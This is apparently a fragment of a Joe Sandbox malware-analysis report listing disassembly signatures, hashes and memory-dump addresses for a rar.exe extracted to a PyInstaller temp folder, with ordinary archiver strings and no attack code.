                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe
                                                                                                                                                                                                                              • API String ID: 3307058713-8968610
                                                                                                                                                                                                                              • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                              • Instruction ID: 7f2c66005f6e5c490312b0a89c18d0141791113daa20264214e1ffb05425c51b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D416936A0CA63C5FB54FF25E4408BCE7A4FB44BA4B994035E91D47B95EEBDE8418320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFilewcsstr
                                                                                                                                                                                                                              • String ID: System Volume Information\
                                                                                                                                                                                                                              • API String ID: 1592324571-4227249723
                                                                                                                                                                                                                              • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                              • Instruction ID: 44fc16edda9598672688cbdd305a0028ecef144b3343467b9ddc6824809f7408
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E531D321A2D691C9FB51FB21E1506B9ABA0BF45BE0F844234DECD17B96DFBCE4418720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: snprintf
                                                                                                                                                                                                                              • String ID: $%s$@%s
                                                                                                                                                                                                                              • API String ID: 4288800496-834177443
                                                                                                                                                                                                                              • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                              • Instruction ID: 73943f8494065721c54ab436dd6451e5ca7cdc2566958a421d81237d70b472d6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2319022A0CAA2D9FA10FB55E4417B9A360FB447A4FC00132DE8D17B55DFBCD505C720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                                              • String ID: Adding %-58s
                                                                                                                                                                                                                              • API String ID: 2948472770-2059140559
                                                                                                                                                                                                                              • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                              • Instruction ID: a8c4911d2fbb98934a3f2607ac79f07a763b7a05deff83b70265207252a77f70
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4115B71B18B51C5EB10BF16E840069F7A1BB94FD0B948535CE4C83764EE7CE6028254
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: ;%%0%du
                                                                                                                                                                                                                              • API String ID: 233258989-2249936285
                                                                                                                                                                                                                              • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                              • Instruction ID: 1c8b1e49037114409d2d3d78cf460358089bce6bb3f5ea5dc533fc7dbe582c0d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE118622A0C691D6F720FB24E4103EAB760FB84758F854131DB8D47695DF7CD949CB50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                                                                                                                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                                              • API String ID: 564652978-2248577382
                                                                                                                                                                                                                              • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                              • Instruction ID: 9bc71864604200e21b796cacf3013e21e4e3fe874856474e70b214f9dd562799
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4E04F21E0C822C2F644F729AC81074B390BF55774FD00370D03E825E19FACAA4AC321